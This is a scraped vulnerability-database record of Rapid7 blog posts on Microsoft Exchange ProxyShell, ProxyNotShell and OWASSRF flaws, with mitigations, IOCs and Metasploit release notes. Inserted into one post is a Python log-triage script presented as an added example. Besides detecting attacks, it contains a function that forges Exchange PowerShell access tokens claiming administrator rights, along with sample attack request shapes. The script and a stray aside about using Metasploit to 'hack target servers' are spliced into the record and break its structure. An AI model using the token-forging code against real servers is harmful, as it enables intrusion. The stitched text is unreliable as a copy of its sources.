\ntransport_factory = TransportFactory.new \ntransport_factory.create_transport(@connection_opts) \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163895/exchange_proxyshell_rce.rb.txt"}], "rapid7blog": [{"lastseen": "2022-10-14T19:25:39", "description": "\n\nOn Thursday, September 29, a Vietnamese security firm called GTSC [published information and 
IOCs](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on what they claimed was a pair of **unpatched** Microsoft Exchange Server vulnerabilities being used in attacks on their customers\u2019 environments dating back to early August 2022. The impact of exploitation, the firm said, is remote code execution. From the information released, both vulnerabilities appeared to be post-authentication flaws. According to GTSC, the vulnerabilities are being exploited to drop webshells on victim systems and establish footholds for post-exploitation behavior. \n\nMicrosoft [confirmed both zero-day vulnerabilities](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) late the evening of September 29, 2022 and said they were aware of \"limited, targeted attacks using the two vulnerabilities to get into users' systems.\" Tracked as CVE-2022-41040 and CVE-2022-41082, neither vulnerability has a patch as of September 30, but Microsoft indicated they're working on an accelerated timeline to release fixes.\n\n * CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability. \n * CVE-2022-41082 allows remote code execution (RCE) when PowerShell is accessible to the attacker.\n\nBoth vulnerabilities require an attacker to have authenticated network access for successful exploitation. The known attacks appear to be a variant of last year's infamous [ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>). 
**Note: **While attacks using these vulnerabilities have so far chained the two CVEs, it is entirely possible that either could be used alone, or chained with different vulnerabilities.\n\nSecurity researchers have [pointed out](<https://twitter.com/GossiTheDog/status/1575597075118497793>) that there are still plenty of Exchange Server installations not patched or improperly patched for [ProxyShell](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>), which gives attackers an easy way into systems that might otherwise be somewhat more resilient to this latest campaign. As of early September 2022, Rapid7 Labs observed up to **191,000 Exchange Servers exposed to the internet** via port 443. \n\n### Threat intelligence\n\nGTSC's [original blog has extensive details](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on the attacks they observed, including various IOCs, malware analysis, and MITRE ATT&CK mapping. \n\nOn September 30, Microsoft also [published additional information](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) on attacks they have observed using these vulnerabilities: \n\n\"MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. 
MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\"\n\n### Mitigation\n\n_**NOTE: **Microsoft has revised the URL Rewrite rule from their mitigation guidance multiple times since this blog came out. Refer to their instructions for the latest guidance._\n\nBoth CVE-2022-41040 and CVE-2022-41082 are unpatched.** **In the absence of a patch, Microsoft has directed on-premises Exchange customers to apply a blocking rule in \u201cIIS Manager -> Default Web Site -> Autodiscover -> URL Rewrite -> Actions\u201d to block the known attack patterns. Organizations should apply the mitigation as Microsoft directs on an emergency basis. \n\n**Microsoft has [full step-by-step URL Rewrite (mitigation) instructions here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). **These instructions have been updated multiple times\u2014check Microsoft's info for the latest.\n\nMicrosoft has confirmed that the URL Rewrite instructions linked above are successful in breaking current attack chains. Authenticated attackers who can access PowerShell Remoting on vulnerable Exchange systems will be able to trigger RCE using CVE-2022-41082. Blocking the ports used for Remote PowerShell can limit these attacks. Therefore, on-premises Exchange customers should review and apply Microsoft's URL Rewrite Instructions **and** block exposed Remote PowerShell ports:\n\n * HTTP: 5985\n * HTTPS: 5986\n\nMicrosoft also \"strongly recommends\" Exchange Server customers [disable](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>) remote PowerShell access for non-admin users.\n\nMicrosoft has said explicitly that Exchange Online Customers do not need to take any action. 
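The URL Rewrite mitigation above blocks the `autodiscover` plus `powershell` request shape at the front end; the same shape, and the forged `X-Rps-CAT` token that the ProxyShell module quoted earlier on this page hands to the PowerShell backend, can also be hunted for after the fact in IIS logs. The script below is an added example written for this page, not code from Microsoft, Rapid7 or the Metasploit modules quoted here. It assumes the default IIS W3C field order (read the `#Fields` header on real logs), uses constructed log lines and a constructed token, and its decoding of the token's `G` (group) and `E` (extension) blocks is our reading of the byte string in the module's `build_token`, not a documented format.

```python
"""Hunt IIS W3C logs for ProxyShell-style SSRF requests and decode any forged
X-Rps-CAT token they carry.

Added example for this page, not code from the Metasploit modules or the
Rapid7 post around it. Field indexes assume the default IIS W3C layout (date
time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip ...); on
real logs parse the #Fields header instead. Reading the token's 'G' block as
(count, then attributes + SID per group) and 'E' as an extension count is our
interpretation of the bytes in the module's build_token, i.e. an assumption.
"""
import base64
import re
import struct
from typing import Dict, List, Optional
from urllib.parse import unquote

# Path confusion looks like autodiscover.json ... @host/<backend>. A legitimate
# Autodiscover v2 query (?Email=user@contoso.com&Protocol=...) also has an '@',
# but nothing like "/mapi" or "/PowerShell" follows the host part.
SSRF_RE = re.compile(r"autodiscover\.json[^\s&]*?@[^\s&/]*/([A-Za-z]+)", re.I)
CAT_RE = re.compile(r"X-Rps-CAT=([^&\s]+)", re.I)
ADMIN_GROUP = "S-1-5-32-544"  # BUILTIN\Administrators, the group the exploit claims
TLV_TAGS = {"V": "version", "T": "type", "C": "compressed", "A": "auth_type",
            "L": "logon_name", "U": "user_sid"}


def build_cat(logon_name: str, user_sid: str, groups=(ADMIN_GROUP,)) -> str:
    """Serialise a CommonAccessToken the same way build_token in the module does."""
    def tlv(tag: str, value: str) -> bytes:
        return tag.encode() + bytes([len(value)]) + value.encode("latin-1")
    tok = tlv("V", "\x00") + tlv("T", "Windows") + b"C\x00"
    tok += tlv("A", "Kerberos") + tlv("L", logon_name) + tlv("U", user_sid)
    tok += b"G" + struct.pack("<I", len(groups))
    for sid in groups:  # 7 is the attribute value the module hard-codes
        tok += struct.pack("<I", 7) + bytes([len(sid)]) + sid.encode()
    return base64.b64encode(tok + b"E" + struct.pack("<I", 0)).decode()


def parse_cat(token_b64: str) -> Dict[str, object]:
    """Inverse of build_cat; raises ValueError/IndexError/struct.error when malformed."""
    data = base64.b64decode(token_b64, validate=True)
    out: Dict[str, object] = {"groups": []}
    i = 0
    while i < len(data):
        tag, i = chr(data[i]), i + 1
        if tag in TLV_TAGS:  # one-byte length, then the value
            n = data[i]
            out[TLV_TAGS[tag]] = data[i + 1:i + 1 + n].decode("latin-1")
            i += 1 + n
        elif tag == "G":  # uint32 group count, then (uint32 attrs, len, SID) each
            (count,), i = struct.unpack_from("<I", data, i), i + 4
            for _ in range(count):
                (attrs,), n = struct.unpack_from("<I", data, i), data[i + 4]
                out["groups"].append((data[i + 5:i + 5 + n].decode(), attrs))
                i += 5 + n
        elif tag == "E":  # uint32 extension count; the module always writes 0
            (count,), i = struct.unpack_from("<I", data, i), i + 4
            if count:
                raise ValueError("extension records present, not decoded")
        else:
            raise ValueError(f"unknown tag {tag!r} at offset {i - 1}")
    if "user_sid" not in out:
        raise ValueError("token has no U (user SID) record")
    return out


def triage_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None when nothing suspicious is seen."""
    f = line.split(" ")
    if line.startswith("#") or len(f) < 9:
        return None
    url = unquote(f[4]) + "?" + unquote(f[5])
    reasons: List[str] = []
    finding: Dict[str, object] = {"client": f[8], "url": url, "reasons": reasons}
    m = SSRF_RE.search(url)
    if m:
        reasons.append(f"autodiscover.json path confusion reaching /{m.group(1)}")
    c = CAT_RE.search(url)
    if c:
        try:
            cat = parse_cat(unquote(c.group(1)))
        except (ValueError, IndexError, struct.error) as exc:
            reasons.append(f"X-Rps-CAT present but undecodable: {exc}")
        else:
            finding["cat"] = cat
            reasons.append(f"X-Rps-CAT for {cat.get('logon_name')} ({cat['user_sid']})")
            if any(sid == ADMIN_GROUP for sid, _ in cat["groups"]):
                reasons.append("token claims BUILTIN\\Administrators membership")
    return finding if reasons else None


def triage(lines) -> List[Dict[str, object]]:
    return [hit for hit in map(triage_line, lines) if hit]


# Constructed sample: a legitimate Autodiscover v2 lookup, then the MAPI probe
# and PowerShell request shapes the module sends, carrying a forged token for a
# made-up mailbox user.
FORGED = build_cat("alice@contoso.example", "S-1-5-21-1004336348-1177238915-682003330-1104")
SAMPLE_LOG = [
    "2022-10-01 10:00:00 10.0.0.5 GET /autodiscover/autodiscover.json Email=alice@contoso.example&Protocol=ActiveSync 443 - 203.0.113.10 Outlook-iOS/2.0 - 200 0 0 31",
    "2022-10-01 10:05:12 10.0.0.5 POST /autodiscover/autodiscover.json a=zz@evil.example/mapi/nspi/ 443 - 198.51.100.7 Mozilla/5.0 - 200 0 0 120",
    f"2022-10-01 10:05:13 10.0.0.5 POST /autodiscover/autodiscover.json a=zz@evil.example/PowerShell/?X-Rps-CAT={FORGED}&Email=Autodiscover/autodiscover.json?a=zz@evil.example 443 - 198.51.100.7 Mozilla/5.0 - 200 0 0 450",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["client"], "->", "; ".join(hit["reasons"]))
```

Run it directly and it reports the two attacker lines, the second with the decoded logon name, SID and the BUILTIN\Administrators group claim. The legitimate Autodiscover v2 lookup, which also contains an `@` in its query, is deliberately not flagged; requiring a `/backend` segment after the host is what separates the path-confusion shape from normal client traffic and is the main false-positive risk of matching on `autodiscover.json` and `@` alone.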
Note, however, that organizations who use hybrid (a mix of on-prem and cloud) Exchange environments should follow on-prem guidance. See [Microsoft's official blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for more details. \n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41040 and CVE-2022-41082 with a remote vulnerability check available in the September 30, 2022 content-only release ( Jar UpdateID: 144473189). The check will identify whether Microsoft's recommended mitigations have been applied. Customers can also use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) or [Dynamic Asset Groups](<https://docs.rapid7.com/nexpose/working-with-asset-groups/>) to identify systems that have Exchange installed on them. \n\n**Note: **Microsoft has revised their recommended URL Rewrite rule several times since October 4. Our vulnerability check has been updated as of the **October 12, 2022 content-only** release to identify the improved mitigation in Microsoft's guidance. \n\nThe behavior described in GTSC's blog is similar to other attacks targeting Exchange over the past 18 months. Rapid7\u2019s InsightIDR and Managed Detection & Response (MDR) customers have detection coverage for currently known post-exploitation attacker behaviors, including but not limited to:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Suspicious Process - Exchange Server Spawns Process\n * Attacker Technique - CertUtil With URLCache Flag\n * Webshell - China Chopper Executing Commands\n * Suspicious Process - Executable Runs From C:\\Perflogs\n\nFor InsightIDR customers, we recommend reviewing the rule action and priority of these detection rules to confirm that they align with their security** **needs. As always, MDR customers are being actively monitored by the Rapid7 SOC. 
If suspicious activity is detected in your environment, you will be contacted by your customer advisor.\n\nWe will update this blog with further information, including coverage additions or enhancements, as needed.\n\n### Updates\n\n**September 30, 2022: **Microsoft has confirmed two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082, are being exploited in \"limited, targeted attacks.\" Microsoft has released mitigation guidance. Our engineering teams are investigating options to allow InsightVM and Nexpose customers to assess exposure to these vulnerabilities. InsightIDR customers have existing detection coverage. \n**[16:30 ET]** Updated information on newly released InsightVM and Nexpose vulnerability checks. \n\n**October 1, 2022: **Clarified wording and directions in _Mitigations _section, added a _Threat intelligence_ section with [Microsoft's analysis](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) of attacks using these vulnerabilities. \n\n**October 4, 2022: **Microsoft published updated mitigation guidance that includes an improvement to their URL Rewrite rule. The string contained in the recommended rule has been modified to be more effective. [Full instructions are here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Our researchers are evaluating whether adjustments to our existing vulnerability checks are required based on Microsoft\u2019s new guidance. \n\n**October 5, 2022: **Our vulnerability check for InsightVM and Nexpose customers will be updated to identify the improved mitigation in Microsoft's revised guidance; this update will go out in the October 5, 2022 content-only release.\n\n**October 11, 2022: **Microsoft made additional improvements to their URL Rewrite rule instructions on October 7 and October 8. 
Full details are in their [blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The vulnerabilities are still unpatched as of the October 11, 2022 Patch Tuesday release. \n\n**October 12, 2022: **Our engineering team has updated checks for these vulnerabilities in the October 12 content-only release. The updates look for the revised URL Rewrite rule in Microsoft's recommended mitigation guidance. \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-29T20:50:50", "type": "rapid7blog", "title": "CVE-2022-41040 and CVE-2022-41082: Unpatched Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-29T20:50:50", "id": "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "href": "https://blog.rapid7.com/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-02T22:08:54", "description": "## ProxyNotShell\n\n\n\nThis week's Metasploit release includes an exploit module for `CVE-2022-41082`, AKA ProxyNotShell by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, [Orange Tsai](<https://github.com/orangetw>), [Piotr Bazyd\u0142o](<https://mobile.twitter.com/chudypb>), [Rich Warren](<https://twitter.com/buffaloverflow>), [Soroush Dalili](<https://twitter.com/irsdl>), and our very own [Spencer 
McIntyre](<https://github.com/zeroSteiner>). The vulnerability `CVE-2022-41082`, AKA ProxyNotShell, is a deserialization flaw in Microsoft Exchange's PSRP (PowerShell Remoting Protocol) backend. Microsoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. For more information, see [CVE-2022-41082](<https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082?referrer=blog>) and [CONTROL YOUR TYPES OR GET PWNED](<https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend>). The ProxyNotShell exploit also added new Exchange SSRF functionality that allows both it and the previous ProxyShell module to target Exchange server instances which use a Database Availability Group (DAG) backend. The Metasploit team has yet to see another public Proof of Concept that takes this configuration type into account.\n\n## Remote Control Collection RCE\n\nCommunity contributors [h00die](<https://github.com/h00die>) and [H4rk3nz0](<https://github.com/H4rk3nz0>) also introduced another exploit module in this week's release. This module targets the Remote Control Collection server software, which lets a remote user connect from a mobile device and send screen and input commands to the PC. Note that this module will only deploy a payload if the server is set without a password (default). 
A side note, if you're looking to learn more about how you can use metasploit to hack target servers using remote code vulnerabilities, you might find this video (<https://www.youtube.com/watch?v=eLbBR956Tgw>) helpful.\n\n## New module content (2)\n\n * [Microsoft Exchange ProxyNotShell RCE](<https://github.com/rapid7/metasploit-framework/pull/17275>) by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, Orange Tsai, Piotr Bazyd\u0142o, Rich Warren, Soroush Dalili, and Spencer McIntyre, which exploits [CVE-2022-41082](<https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082?referrer=blog>) \\- This adds an exploit module for `CVE-2022-41082`, AKA ProxyNotShell. This vulnerability is a deserialization flaw in Microsoft Exchange's PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as `GHSA-6ph7-8wxv-6gf2`. Together, these vulnerabilities allow an authenticated attacker to execute arbitrary commands on a Microsoft Exchange Server.\n * [Remote Control Collection RCE](<https://github.com/rapid7/metasploit-framework/pull/17087>) by H4rk3nz0 and h00die - This PR adds an exploit targeting the Remote Control Server software which allows remote control of a PC, now including running a payload.\n\n## Enhancements and features (1)\n\n * [#17304](<https://github.com/rapid7/metasploit-framework/pull/17304>) from [om3rcitak](<https://github.com/om3rcitak>) \\- Improves `auxiliary/scanner/http/tomcat_mgr_login.rb` error message on 401 status codes to include the user defined URI.\n\n## Bugs fixed (2)\n\n * [#17163](<https://github.com/rapid7/metasploit-framework/pull/17163>) from [jheysel-r7](<https://github.com/jheysel-r7>) \\- This fixes a bug in the check method where we left an artifact on disk.\n * [#17299](<https://github.com/rapid7/metasploit-framework/pull/17299>) from [smashery](<https://github.com/smashery>) \\- This fixes a bug in the `polkit_dbus_auth_bypass` module that prevented it from working with certain session 
types.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.28...6.2.29](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-11-24T10%3A30%3A44%2B00%3A00..2022-12-01T09%3A50%3A22-06%3A00%22>)\n * [Full diff 6.2.28...6.2.29](<https://github.com/rapid7/metasploit-framework/compare/6.2.28...6.2.29>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-02T21:00:13", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-12-02T21:00:13", "id": "RAPID7BLOG:0451F386C3F603C8DC3AE2E3F42A90D1", "href": "https://blog.rapid7.com/2022/12/02/metasploit-weekly-wrap-up-186/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-22T00:09:55", "description": "\n\n_Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too._\n\nBeginning December 20, 2022, Rapid7 has responded to an increase in the number of Microsoft Exchange 
server compromises. Further investigation aligned these attacks to what CrowdStrike is reporting as \u201c[OWASSRF](<https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/>)\u201d, a chaining of CVE-2022-41080 and CVE-2022-41082 to bypass URL rewrite mitigations that Microsoft provided for [ProxyNotShell](<https://www.rapid7.com/blog/post/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/>) allowing for remote code execution (RCE) via privilege escalation via Outlook Web Access (OWA).\n\n**Patched servers do not appear vulnerable, servers only utilizing Microsoft\u2019s mitigations do appear vulnerable.**\n\nThreat actors are using this to deploy ransomware.\n\n**Rapid7 recommends that organizations who have yet to install the Exchange update (KB5019758) from November 2022 should do so immediately and investigate systems for indicators of compromise. Do not rely on the rewrite mitigations for protection.**\n\n## Affected Products\n\nThe following on-prem versions of Exchange that have not applied the November 8, 2022 [KB5019758](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-8-2022-kb5019758-2b3b039b-68b9-4f35-9064-6b286f495b1d>) update are vulnerable:\n\n * Microsoft Exchange Server 2013\n * Microsoft Exchange Server 2016\n * Microsoft Exchange Server 2019\n\n## IOCs\n\nIn addition to the detection rules included in InsightIDR for Rapid7 customers, other IOCs include:\n\n * PowerShell spawned by IIS ('w3wp.exe') creating outbound network connections\n * `45.76.141[.]84`\n * `45.76.143[.]143`\n\nExample command being spawned by IIS (w3wp.exe):\n\n\n\nDecoded command where the highlighted string (0x2d4c8f8f) is the hex representation of the IP address 45.76.143[.]143\n\n\n\nRapid7 has evidence of exploitation in the wild as far back as December 1, 2022.\n\n## Rapid7 Customers\n\nCustomers already have coverage 
to assist in assessing exposure to and detecting exploitation of this threat.\n\n### InsightVM and Nexpose\n\nInsightVM and Nexpose added checks for CVE-2022-41080 and CVE-2022-41082 on November 8, 2022.\n\n### InsightIDR\n\nInsightIDR customers can look for the alerting of the following rules, typically seeing several (or all) triggered on a single executed command:\n\n * Attacker Technique - PowerShell Registry Cradle\n * Suspicious Process - PowerShell System.Net.Sockets.TcpClient\n * Suspicious Process - Exchange Server Spawns Process\n * PowerShell - Obfuscated Script\n * Webshell - IIS Spawns PowerShell\n\nAdditional detections currently being observed with follow-on activity in these compromises include:\n\n * Attacker Technique - Plink Redirecting RDP\n * Attacker Technique - Renamed Plink\n * Suspicious Process - Started From Users Music Directory\n\n### Managed Detection & Response customers\n\nYour customer advisor will reach out to you right away if any suspicious activity is observed in your organization.\n\n_Eoin Miller contributed to this article._\n\n## Updates\n\n12/21/22 4PM ET: Updated IOC with EITW information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T17:35:17", "type": "rapid7blog", "title": "CVE-2022-41080, CVE-2022-41082: Rapid7 Observed Exploitation of `OWASSRF` in Exchange for RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2022-12-21T17:35:17", "id": "RAPID7BLOG:4F13870ACE30DEDD995C2DDE4E4FF4D0", "href": 
"https://blog.rapid7.com/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-09T20:11:17", "description": "\n\n2022 began on a solemn note \u2014 many organizations across the globe were recovering from the [Log4Shell zero-day vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). For the InsightVM and Nexpose team, 2022 began with a lot of introspection on how we can add more value and keep meeting our customer needs in the best possible ways. This means we continue to prioritize what really matters, even if it means making some hard decisions, and further improve communication with our customers.\n\nOver the course of 2022, we launched many new features and improvements \u2014 some highly anticipated, many customer-requested. Log4j was difficult but we learnt from it to be quicker and better with our emergent threat response. [Rapid7 recently refreshed our coordinated vulnerability disclosure (CVD) policy and philosophy](<https://www.rapid7.com/blog/post/2022/12/28/refreshing-rapid7s-coordinated-vulnerability-disclosure-policy/>). As we ran into more edgy kinds of vulnerabilities, we learnt that we couldn't treat them all as equal and there is a need to be more agile with our CVD approach. So we came up with six classes of vulnerabilities (and a meta-classification of \"more than one\") and some broad strokes of what we intend to accomplish with our CVD for each of them.\n\nWe reimagined many of our internal processes and teams to drive better customer outcomes. 
For instance, we are making a significant investment in re-architecting the InsightVM/Nexpose database to ensure VM programs scale with the customers evolving IT environment.\n\nHere\u2019s a snapshot of 2022 in InsightVM:\n\n### Key Product Improvements\n\n****Agent-based policy**** ****assessment****\n\nA robust vulnerability management program should assess IT assets for misconfigurations along with vulnerabilities. That's why we were thrilled to introduce [Agent-Based Policy in InsightVM](<https://docs.rapid7.com/insightvm/assess-with-agent-based-policies/>). Customers can now use Insight Agents to conduct configuration assessments of IT assets against widely used industry benchmarks from the Center for Internet Security (CIS) and the U.S. Defense Information Systems Agency (DISA) to help prevent breaches and ensure compliance.\n\n\n\n**Remediation Project improvements**\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). [Here are our favorite updates](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>):\n\n * ****Remediator Export -**** a new solution-based CSV export option, Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution.\n * ****Better way to track project progress -**** The new metric that calculates progress for Remediation Projects will advance for each individual asset remediated within a \u201csolution\" group. This means customers no longer have to wait for all the affected assets to be remediated to see progress.\n\n\n****Scan Assistant****\n\n[Scan Assistant](<https://www.rapid7.com/globalassets/_pdfs/product-and-service-briefs/extend_vulnerability_coverage_scan_assistant.pdf>) provides an innovative alternative to traditional credentialed scanning. 
Instead of account-based credentials, it uses digital certificates, which increases security and simplifies administration for authenticated scans.\n\n * ****Scan Assistant is now generally available for Linux****\n * ****Automatic Scan Assistant credential generation -**** taking some more burden off the vulnerability management teams, customers can use the Shared Credentials management UI to automatically generate Scan Assistant credentials\n * ****Improved scalability -**** automated Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants.\n\n**Dashboards and reports**\n\nCustomers like to use dashboards to visualize the impact of a specific vulnerability or vulnerabilities to their environment, and we made quite a few updates in that area:\n\n * ****New dashboard cards based on CVSS v3 severity -**** we [expanded CVSS dashboard cards](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) to include a version that sorts the vulnerabilities based on CVSS v3 scores (along with CVSS v2 scores).\n * ****Threat feed dashboard includes CISA's KEV catalog -**** we extended the scope of vulnerabilities tracked to [incorporate CISA's KEV catalog](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>) in the InsightVM Threat Feed Dashboard to help customers prioritize faster.\n * ****5 New Dashboard Cards -**** We launched a set of five new dashboard cards that utilize line charts to show trends in vulnerability severity and allow for easy comparison when reporting.\n * ****Distribute Reports via Email -**** Customers can now send InsightVM reports to their teammates through email.\n\n\n**Agent improvements for virtual desktops**\n\nPandemic fueled remote work and with it the use of virtual desktops. 
InsightVM can now identify [agent-based assets that are Citrix VDI](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) instances and correlate them to the user, enabling more accurate asset/instance tagging. This will create a smooth, streamlined experience for organizations that deploy and scan Citrix VDIs. Expect similar improvements for VMware Horizon VDIs in 2023.\n\n**Improved support**\n\nA new, opt-in feature eliminates the need for customers to attach logs to support cases and/or send logs manually, ensuring a faster, more intuitive support process.\n\n### Notable Emergent Threat Responses and Recurring Coverages\n\nIn 2022, we added support for enterprise systems like Windows Server 2022, AlmaLinux, VMware Horizon (server and client), and more to the recurring coverage list. Learn about the systems with [recurring coverage](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>).\n\nRapid7's Emergent Threat Response (ETR) program is part of an ongoing process to deliver fast, expert analysis alongside first-rate security content for the highest-priority security threats. This year we flagged a number of critical vulnerabilities. 
To list a few:\n\n * [Microsoft Exchange Server Server-Side Request Forgery](<https://www.rapid7.com/blog/post/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and Remote Code Execution (CVE-2022-41040 and CVE-2022-41082)\n * [OpenSSL Buffer Overflows](<https://www.rapid7.com/blog/post/2022/11/01/cve-2022-3786-and-cve-2022-3602-two-high-severity-buffer-overflows-in-openssl-fixed/>) (CVE-2022-3786 and CVE-2022-3602)\n * [Confluence Server and Data Center Unauthenticated Remote Code Execution](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) (CVE-2022-26134)\n * [Fortinet FortiOS Authentication Bypass](<https://www.rapid7.com/blog/post/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/>) (FortiGate, FortiProxy, FortiSwitch Manager) (CVE-2022-40684)\n\nThat's not all. We added over 21,000 new checks across close to 9000 CVEs to help customers understand their risk better and thus secure better.\n\nCheck out our past blogs - [Q1](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>), [Q2](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>), and 